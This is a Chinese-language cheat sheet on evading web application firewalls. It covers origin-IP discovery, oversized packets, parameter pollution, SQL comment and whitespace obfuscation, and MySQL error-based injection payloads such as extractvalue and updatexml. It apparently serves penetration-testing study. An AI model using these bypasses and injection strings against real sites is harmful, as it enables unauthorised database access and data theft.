1.架构层面绕过waf
(1)寻找源网站绕过waf检测
主要针对的是云waf,找到源网站的真实地址(可以用超级ping),进行绕过,有点像CDN
(2)通过同网段绕过waf防护
在一个网段中,可能经过的数据不会经过云waf,从而实现绕过。
2.资源限制角度绕过waf
一般waf的执行需要优先考虑业务优先的原则,所以对于构造较大、超大数据包可能不会进行检测,从而实现绕过waf。
3.协议层面绕过waf
(1)协议未覆盖绕过waf
比如由于业务需要,只对get型进行检测,post数据选择忽略
(2)参数污染
index?id=1&id=2 waf可能只对id=1进行检测
4.规则层面的绕过
(1)sql注释符绕过
union /**/select #我们将union select之间的空格使用注释符进行替换(适用于对union select之间的空格进行检测的情况)
union/*crow%0%32#*/select #我们在注释符中间填充内容
union/*aaaaaaaaaabbbbbbbbbcccccccccccdddddddddddeeeeeeeeeeee%%%%%%%%%*/select #构造较大数据
/*!union select*/= #内联注释,mysql特有
(2)空白符绕过
mysql空白符:%09;%0A; %0B; %0D; %20; %0C; %A0; /*XXX*/
正则空白符: %09;%0A; %0B; %0D; %20;
%25其实就是百分号 %25A0 就是空白符
(3)函数分割符号
将一个函数进行分割,例:concat()
%25其实就是百分号 %25A0 就是空白符
concat%2520(
concat/**/(
concat%250c(
concat%25a0(
- 浮点数词法解释
waf对于id=1可以进行检测,但是对于id=1E0、id=1.0、id=\N可能就无法检测
5. 利用error-based(报错注入)进行sql注入
一些常用的报错注入函数
extractvalue(1, concat(0x5c,md5(3)));
updatexml(1, concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
- mysql 特殊语法
select {x schema_name} from {x information_schema.schemata};
select {x 1};